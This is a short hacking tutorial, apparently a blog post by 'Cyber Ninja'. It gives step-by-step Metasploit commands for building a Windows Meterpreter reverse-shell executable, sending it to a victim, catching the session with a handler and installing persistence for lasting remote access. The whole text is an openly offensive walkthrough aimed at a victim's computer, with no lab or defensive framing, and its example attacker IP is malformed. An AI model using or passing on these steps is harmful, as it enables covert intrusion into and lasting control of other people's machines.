༒ Windows Hacked LifeLong Persistent Attack Using Metasploit - Cyber Ninja༒
Now Create Payload :
Commants:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(Your IP) LPORT=(Your Specific Port) -f exe>filename.exe
=>Run This Command And Wait For 1 Minute
Now Payload was Created:
=>Open Your [ Metasploit-framework/bin/ ]
Folder Check Your (exe file).
=>Now Send The (exe file) To Victim.
=>Now Open Metasploit Framework.
=>Open Command Prompt In This Path
[ Metasploit-framework/bin/ ]
=>msfconsole (If Not Work Give This
Command msfconsole.bat ).
Now Metasploit-Framework Opened:
Stop1:
use exploit/multi/handler
Step2:
set payload windows/meterpreter/reverse_tcp
Step3:
set LHOST (Your IP)
Step4:
set LPORT (Your Specific Port)
Step5:
exploit
=>Now Started Reverse tcp Handler : 4444
=>Now Server Waiting For Victim Interaction.
=>Victim Installed And Opened The File.
=>Meterpreter Session 1 Opened.
(successfully Hacked ).
Now Meterpreter Session Opened:
=>Type "help" Command To Know All
Commands.
Persistence Attack:
=>In Meterpreter Session To Start The
Persistence Attacking.
Comments:
Step1:
run persistence -h
Step2:
Now It Can Show How To Use Commands:
run persistence -U -i 20 -p (Your Specific Port) -r (Your IP)
Example : run persistence -U -i 20 -p 4444 -r 123.323.4.241
Click Enter To Run The Command:
Now It Can Automatically Inject The Persistence Payload Into Victim System.
Then Any Time You Access The Victim System
All The Best
By Cyber Ninja
꧁UNDER SCOPE꧂
-----------------------



ConversionConversion EmoticonEmoticon